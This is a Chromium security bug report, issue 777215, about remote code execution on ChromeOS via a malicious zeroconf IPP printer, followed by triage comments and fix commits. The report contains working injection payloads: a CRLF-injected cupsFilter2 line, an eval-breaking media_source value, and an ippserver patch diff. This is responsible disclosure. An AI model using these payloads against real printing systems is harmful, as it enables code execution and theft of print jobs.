
Issue metadata

Status: Fixed
Owner:
Closed: Nov 2017
Cc:
Components:
EstimatedDays: ----
NextAction: 2017-10-30
OS: Chrome
Pri: 1
Type: Bug-Security




Issue 777215: Security: ChromeOS printer zeroconf remote code execution

Reported by r...@rorym.cnamara.com, Oct 22 2017

Issue description

Google Chrome		61.0.3163.123 (Official Build) (64-bit)
Platform		9765.85.0 (Official Build) stable-channel swanky
Firmware Version	Google_Swanky.5216.238.5

Two different bugs (CRLF injection and eval based code injection) can be used by a malicious IPP server to cause ChromeOS to install a malicious PPD file which, on printing, will cause the payload to be executed with the same privileges as the cups daemon (cups:root inside a seccomp jail [1]).

To enable exploitation, the test ippserver from the cups distribution [2] can be modified and used.

The IPP server can specify formats to be accepted by the printer, which can be used to specify a specific filter executable to be executed when a print job is sent. Since the passed value is interpolated into the cupsFilter2 line, it is necessary to inject newlines and PPD comment characters to completely control the configuration item.

cupsFilter2 lines should normally look similar to:

*cupsFilter2: "application/vnd.cups-pdf application/pdf 10 -"

but the IPP server can control the second parameter, so we can inject a payload as below:

*cupsFilter2: "application/pdf application/vnd.cups-postscript 0 pstopxl"
*%;echo ********EXPLOIT START********|logger;env|logger;echo ****    ****|logger|cat ${PPD}|logger;echo ********EXPLOIT END********|logger;exit
*% application/pdf application/vnd.cups-postscript 0 pstopxl"
*%;echo ********EXPLOIT START********|logger;env|logger;echo ****    ****|logger|cat ${PPD}|logger;echo ********EXPLOIT END********|logger;exit
*% 10 -"

The payload is injected twice, but we can use \n*% to cause subsequent lines to be turned into comments. The format of our payload will become clear with the second exploit.

The configuration for this bug is specified in the 'formats' variable in the malicious IPP server [3], which we can change to the following to achieve the above payload:

-		*formats = "application/pdf,image/jpeg,image/pwg-raster";
+		*formats = "application/pdf,application/pdf application/vnd.cups-postscript 0 pstopxl\"\n*%;echo ********EXPLOIT START********|logger;env|logger;echo ****    ****|logger|cat ${PPD}|logger;echo ********EXPLOIT END********|logger;exit\n*%";

Along with our payload, we also specify the 'pstopxl' filter executable, which is present on ChromeOS. This executable contains an eval based command injection vulnerability. eval is used in multiple locations throughout the cups filter distributions, but the specific one we exploit in this case is the DefaultInputSlot injection point [4]. This parameter can also be controlled by the malicious IPP server to cause the injection. In this case we modify the 'media_source_supported' array by changing the default value of 'auto' to one that will break out of the eval location and execute our code.

-  "auto",
+  "x}\"$(sh${IFS}${PPD})\"x",

Since the payload length is limited, we use the PPD file itself as a shell based payload. As can be seen in the above cupsFilter2 payload, we use ; to add multiple commands on the same line, and an 'exit' so the payload is not executed twice. The value of ${PPD} is set by the parent of the filter, so we do not need to worry about locating our payload file. In my tests, all lines in the PPD file are not valid shell commands, so there are no side effects other than errors being output for invalid commands.

With these two exploits the malicious IPP server can gain command execution on ChromeOS as cups:root, inside the seccomp jail [1]. I was unable to escape from the seccomp jail and limited user, but the seccomp policy is open enough for most malicious activities. From the restricted position, the payload should be able to read most current and future print jobs (after a reboot it would be necessary for the malicious printer to be re-used as there is no persistence).

To reproduce this vulnerability, patch ippserver from the cups distribution using the attached patch (commit 0bc1a539f used for testing, but any should work).  Compile and run similarly to the following:

sudo ./ippserver -v exploit -p 631

Add a new printer
- chrome://md-settings/cupsPrinters
- or print a page, change Destination, Local Destinations -> Manage (will redirect to chrome://settings/cupsPrinters)
Add printer, Add nearby printer

Once the printer has been added using zeroconf, print to it and observe the payload output in file:///var/log/messages (^F for EXPLOIT). Interestingly, printers added using this method persist across a powerwash (noticed when transitioning into dev mode).

The exploit printer could masquerade as a legitimate printer, and proxy all jobs to the real printer for invisible exploitation.

Judging by the network traffic generated by the print preview window, I would imagine that one day local printers would automatically appear, increasing the likelihood of this exploit, but I was unable to get this to work, hence having to navigate to the settings and add the printer with more button clicks.

A LAN presence is required to exploit this vulnerability.

I have also attached the PPD file created on the device (obtained via developer mode) to show the injection locations.

[1] https://chromium.googlesource.com/chromiumos/overlays/chromiumos-overlay/+/master/net-print/cups/files/cupsd-seccomp-amd64.policy
[2] https://github.com/apple/cups/blob/master/test/ippserver.c
[3] https://github.com/apple/cups/blob/master/test/ippserver.c#L485
[4] https://github.com/richud/gstoraster/blob/master/cups/gstopxl#L110
 
ipp.patch
1.8 KB Download
zeroconf-133d2240cda28dd836f79ecdf2654c8e.ppd
5.4 KB Download

Comment 1 by elawrence@chromium.org, Oct 23 2017

Components: Internals>Printing>CUPS
Labels: OS-Chrome

Comment 2 by kerrnel@chromium.org, Oct 24 2017

Cc: jorgelo@chromium.org adlr@chromium.org mnissler@chromium.org

Comment 3 by jorgelo@chromium.org, Oct 25 2017

Labels: Security_Severity-High Security_Impact-Stable M-62
Owner: adlr@chromium.org
Sandboxed RCE is... not great.

Andrew, this needs to be handled by the CUPS CrOS printing team ASAP as a high-severity bug.

Comment 4 by jorgelo@chromium.org, Oct 25 2017

NextAction: 2017-10-27

Comment 5 by jorgelo@chromium.org, Oct 25 2017

Also, do we even need zeroconf?

Comment 6 by adlr@chromium.org, Oct 25 2017

Labels: Pri-0
Owner: skau@chromium.org
Status: Assigned (was: Unconfirmed)
Zeroconf is a critical feature for the product. Assigning to Sean to look at as Justin (who worked a lot on this) is ooo a lot of this week, including now.

Comment 7 by jorgelo@chromium.org, Oct 25 2017

Labels: -Pri-0 Pri-1
We usually mark high-severity bugs as P1 (sandboxed code exec is high-severity per our ratings at http://www.chromium.org/developers/severity-guidelines), but we do expect it to be fixed in the current milestone and backported to stable.

Thanks!

Comment 8 by skau@chromium.org, Oct 26 2017

Status: Started (was: Assigned)
I'm looking into this.  We can likely disable downloading arbitrary PPDs from untrusted servers.

Comment 9 by skau@chromium.org, Oct 26 2017

There are two patches from upstream that restrict what filters we accept which will prevent the pstopxl filter being configured for zeroconf printers.

https://github.com/apple/cups/commit/07428f6a640ff93aa0b4cc69ca372e2cf8490e41
https://github.com/apple/cups/commit/1add23375658e9163e5493ee19de7c9f7a9b483b

Comment 10 by jorgelo@chromium.org, Oct 26 2017

Thanks Sean! Can we also do something about the CRLF injection, maybe patch that locally? Or, can we remove and/or fix the eval in the pstopxl filter?

Comment 11 by r...@rorym.cnamara.com, Oct 26 2017

Quick note: pstopxl was not the only filter that appeared to contain exploitable evals. I can't check on my device right now, but grepping in /usr/libexec/cups/filter/ should find more.

Comment 12 by monor...@bugs.chromium.org, Oct 27 2017

The NextAction date has arrived: 2017-10-27

Comment 13 by jorgelo@chromium.org, Oct 27 2017

Hey Sean, were you able to at least start landing those patches? We can look at the other filters next, but we should start by making sure pstopxl is not reachable.

Thanks!

Comment 14 by skau@chromium.org, Oct 27 2017

I just sent a CL so we don't configure pstopxl as a filter for an automatically configured printer.

I'm going to look into the filters before the CRLF injection.  We're going to stop allowing insertion of arbitrary values for filters but there are other fields where we should disallow CRLF.

Comment 15 by skau@chromium.org, Oct 28 2017

NextAction: 2017-10-30

Comment 16 by skau@chromium.org, Oct 29 2017

It looks like gstopxl is from cups-filters, not ghostscript.  I'm investigating if it can be removed.

Comment 17 by monor...@bugs.chromium.org, Oct 30 2017

The NextAction date has arrived: 2017-10-30

Comment 18 by bugdroid1@chromium.org, Oct 30 2017

Project Member
The following revision refers to this bug:
  https://chromium.googlesource.com/chromiumos/overlays/chromiumos-overlay/+/2ef707a9b50f577b2d4b5fdfcea99736a5ac9448

commit 2ef707a9b50f577b2d4b5fdfcea99736a5ac9448
Author: Sean Kau <skau@chromium.org>
Date: Mon Oct 30 23:21:07 2017

net-print/cups: Backport patches to restrict IPP Everywhere filters.

Restrict filters we accept for IPP Everywhere configurations to
exactly PDF, JPEG, PNG, PWG-Raster.

URF was added in the original patch but has been explicitly
excluded since we lack the appropriate filter changes.

BUG= chromium:777215 
TEST=Verify zeroconf setup still works.

Change-Id: Ief1ab83cfc0f1cb5c7c71740ddf5a1aeed066bcb
Reviewed-on: https://chromium-review.googlesource.com/742381
Commit-Ready: Sean Kau <skau@chromium.org>
Tested-by: Sean Kau <skau@chromium.org>
Reviewed-by: Jorge Lucangeli Obes <jorgelo@chromium.org>

[rename] https://crrev.com/2ef707a9b50f577b2d4b5fdfcea99736a5ac9448/net-print/cups/cups-2.1.4-r28.ebuild
[add] https://crrev.com/2ef707a9b50f577b2d4b5fdfcea99736a5ac9448/net-print/cups/files/cups-2.2.2-Only-list-supported-PDLs-Issue-4923.patch
[modify] https://crrev.com/2ef707a9b50f577b2d4b5fdfcea99736a5ac9448/net-print/cups/cups-2.1.4.ebuild
[add] https://crrev.com/2ef707a9b50f577b2d4b5fdfcea99736a5ac9448/net-print/cups/files/cups-2.2.2-Tweak-the-PDL-priority-Issue-4932.patch

Comment 19 by skau@chromium.org, Oct 30 2017

Cc: weifangsun@chromium.org

Comment 20 by skau@chromium.org, Nov 1 2017

Cc: briannorris@chromium.org

Comment 21 by skau@chromium.org, Nov 3 2017

Updating cups-filters to the current version (1.17.8) removes the eval vulnerability.

Comment 22 by skau@chromium.org, Nov 3 2017

I'm going to mark this as fixed so I can get the cherry-pick approved.

Comment 23 by skau@chromium.org, Nov 3 2017

Labels: Merge-Request-63 Merge-Request-62
Status: Fixed (was: Started)

Comment 24 by sheriffbot@chromium.org, Nov 3 2017

Project Member
Labels: -Merge-Request-63 Merge-Review-63 Hotlist-Merge-Review
This bug requires manual review: M63 has already been promoted to the beta branch, so this requires manual review
Please contact the milestone owner if you have questions.
Owners: cmasso@(Android), cmasso@(iOS), gkihumba@(ChromeOS), govind@(Desktop)

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 25 by sheriffbot@chromium.org, Nov 4 2017

Project Member
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify

Comment 26 by awhalley@chromium.org, Nov 6 2017

Labels: Release-0-M62

Comment 27 by awhalley@chromium.org, Nov 6 2017

Labels: CVE-2017-15400 reward-topanel

Comment 28 by josa...@chromium.org, Nov 6 2017

Labels: -Merge-Request-62 -Merge-Review-63 Merge-Approved-62 Merge-Approved-63
approving M-62 and M-63

Comment 29 by bugdroid1@chromium.org, Nov 6 2017

Project Member
Labels: merge-merged-release-R62-9901.B
The following revision refers to this bug:
  https://chromium.googlesource.com/chromiumos/overlays/chromiumos-overlay/+/3de55925d80fc923c793a0ffefdb0cbb177996d6

commit 3de55925d80fc923c793a0ffefdb0cbb177996d6
Author: Sean Kau <skau@chromium.org>
Date: Mon Nov 06 22:42:46 2017

net-print/cups: Backport patches to restrict IPP Everywhere filters.

Restrict filters we accept for IPP Everywhere configurations to
exactly PDF, JPEG, PNG, PWG-Raster.

URF was added in the original patch but has been explicitly
excluded since we lack the appropriate filter changes.

BUG= chromium:777215 
TEST=Verify zeroconf setup still works.

Change-Id: Ief1ab83cfc0f1cb5c7c71740ddf5a1aeed066bcb
Previous-Reviewed-on: https://chromium-review.googlesource.com/742381
(cherry picked from commit ea0ae7891ba8e2983634f406c9df7ce746962a90)
Reviewed-on: https://chromium-review.googlesource.com/747848
Reviewed-by: Jorge Lucangeli Obes <jorgelo@chromium.org>
Commit-Queue: Sean Kau <skau@chromium.org>
Tested-by: Sean Kau <skau@chromium.org>
Trybot-Ready: Sean Kau <skau@chromium.org>

[add] https://crrev.com/3de55925d80fc923c793a0ffefdb0cbb177996d6/net-print/cups/cups-2.1.4-r28.ebuild
[add] https://crrev.com/3de55925d80fc923c793a0ffefdb0cbb177996d6/net-print/cups/files/cups-2.2.2-Only-list-supported-PDLs-Issue-4923.patch
[modify] https://crrev.com/3de55925d80fc923c793a0ffefdb0cbb177996d6/net-print/cups/cups-2.1.4.ebuild
[add] https://crrev.com/3de55925d80fc923c793a0ffefdb0cbb177996d6/net-print/cups/files/cups-2.2.2-Tweak-the-PDL-priority-Issue-4932.patch

Comment 30 by bugdroid1@chromium.org, Nov 6 2017

Project Member
Labels: merge-merged-release-R63-10032.B
The following revision refers to this bug:
  https://chromium.googlesource.com/chromiumos/overlays/chromiumos-overlay/+/00e71e234336642d5ccbdc657286fd7d9086602d

commit 00e71e234336642d5ccbdc657286fd7d9086602d
Author: Sean Kau <skau@chromium.org>
Date: Mon Nov 06 22:42:51 2017

net-print/cups: Backport patches to restrict IPP Everywhere filters.

Restrict filters we accept for IPP Everywhere configurations to
exactly PDF, JPEG, PNG, PWG-Raster.

URF was added in the original patch but has been explicitly
excluded since we lack the appropriate filter changes.

BUG= chromium:777215 
TEST=Verify zeroconf setup still works.

Change-Id: Ief1ab83cfc0f1cb5c7c71740ddf5a1aeed066bcb
Previous-Reviewed-on: https://chromium-review.googlesource.com/742381
(cherry picked from commit 9e2af650268d45e9e51ae1da29ff6bbed934ecf5)
Reviewed-on: https://chromium-review.googlesource.com/747871
Reviewed-by: Jorge Lucangeli Obes <jorgelo@chromium.org>
Commit-Queue: Sean Kau <skau@chromium.org>
Tested-by: Sean Kau <skau@chromium.org>
Trybot-Ready: Sean Kau <skau@chromium.org>

[rename] https://crrev.com/00e71e234336642d5ccbdc657286fd7d9086602d/net-print/cups/cups-2.1.4-r28.ebuild
[add] https://crrev.com/00e71e234336642d5ccbdc657286fd7d9086602d/net-print/cups/files/cups-2.2.2-Only-list-supported-PDLs-Issue-4923.patch
[modify] https://crrev.com/00e71e234336642d5ccbdc657286fd7d9086602d/net-print/cups/cups-2.1.4.ebuild
[add] https://crrev.com/00e71e234336642d5ccbdc657286fd7d9086602d/net-print/cups/files/cups-2.2.2-Tweak-the-PDL-priority-Issue-4932.patch

Comment 31 by bugdroid1@chromium.org, Nov 7 2017

Project Member
The following revision refers to this bug:
  https://chromium.googlesource.com/chromiumos/overlays/portage-stable/+/8827c2d9757d829a474163eb7150e66e37064284

commit 8827c2d9757d829a474163eb7150e66e37064284
Author: Sean Kau <skau@chromium.org>
Date: Tue Nov 07 07:49:01 2017

net-print/cups-filters: Update to 1.17.8

Updating the cups-filters package to 1.17.8 from 1.8.2.  Many of
the filters were rewritten to remove a lot of the bash scripts.
The previously included patches are in 1.17.8.

BUG= chromium:777215 
TEST=Print a page using the foomatic-rip filter.

Change-Id: Icbde6517925dd88b3fdf6d170b500dabc144effc
Reviewed-on: https://chromium-review.googlesource.com/750045
Commit-Ready: Brian Norris <briannorris@chromium.org>
Tested-by: Sean Kau <skau@chromium.org>
Reviewed-by: Brian Norris <briannorris@chromium.org>
Reviewed-by: Mike Frysinger <vapier@chromium.org>

[modify] https://crrev.com/8827c2d9757d829a474163eb7150e66e37064284/net-print/cups-filters/Manifest
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.8.2-configure-PKG_CONFIG.patch
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.0.71-poppler0340.patch
[add] https://crrev.com/8827c2d9757d829a474163eb7150e66e37064284/net-print/cups-filters/files/cups-browsed.init.d-r1
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-browsed.service
[modify] https://crrev.com/8827c2d9757d829a474163eb7150e66e37064284/net-print/cups-filters/metadata.xml
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.0.65-poppler0310.patch
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-browsed.init.d
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/cups-filters-1.8.2-r5.ebuild
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.8.2-gstoraster-path-lookup.patch
[add] https://crrev.com/8827c2d9757d829a474163eb7150e66e37064284/net-print/cups-filters/cups-filters-1.17.8.ebuild
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.8.2-disable-ijs.patch
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.0.53-uclibc.patch
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.8.2-foomatic-rip-sig-pipe.patch
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.8.2-gstoraster.patch
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.8.1-allow-disable-ghostscript.patch

Comment 32 by awhalley@chromium.org, Nov 9 2017

Labels: -reward-topanel reward-unpaid reward-2000
*** Boilerplate reminders! ***
Please do NOT publicly disclose details until a fix has been released to all our users. Early public disclosure may cancel the provisional reward. Also, please be considerate about disclosure when the bug affects a core library that may be used by other products. Please do NOT share this information with third parties who are not directly involved in fixing the bug. Doing so may cancel the provisional reward. Please be honest if you have already disclosed anything publicly or to third parties. Lastly, we understand that some of you are not interested in money. We offer the option to donate your reward to an eligible charity. If you prefer this option, let us know and we will also match your donation - subject to our discretion. Any rewards that are unclaimed after 12 months will be donated to a charity of our choosing.
*********************************

Comment 33 by awhalley@chromium.org, Nov 9 2017

Nice one! The VRP panel decided to award $2,000 for this report.  Thanks!

Comment 34 by awhalley@chromium.org, Nov 10 2017

Labels: -reward-unpaid reward-inprocess

Comment 35 by sheriffbot@chromium.org, Nov 10 2017

Project Member
Cc: josa...@chromium.org
This issue has been approved for a merge. Please merge the fix to any appropriate branches as soon as possible!

If all merges have been completed, please remove any remaining Merge-Approved labels from this issue.

Thanks for your time! To disable nags, add the Disable-Nags label.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 36 by skau@chromium.org, Nov 10 2017

Labels: -Merge-Approved-62 -Merge-Approved-63

Comment 37 by jorgelo@chromium.org, Nov 16 2017

Just to close the loop on this, I believe the merges broke some filters which is why Sean did not backport the CUPS uprev.

Comment 38 by skau@chromium.org, Nov 16 2017

Yes.  The filters are not being backported.  However, the remote vulnerability is fixed by the cups patch which has been backported to 62.

Comment 39 by sheriffbot@chromium.org, Feb 9 2018

Project Member
Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 40 by sheriffbot@chromium.org, Mar 27 2018

Project Member
Labels: -M-62 M-65

Comment 41 by awhalley@chromium.org, Apr 25 2018

Labels: CVE_description-submitted
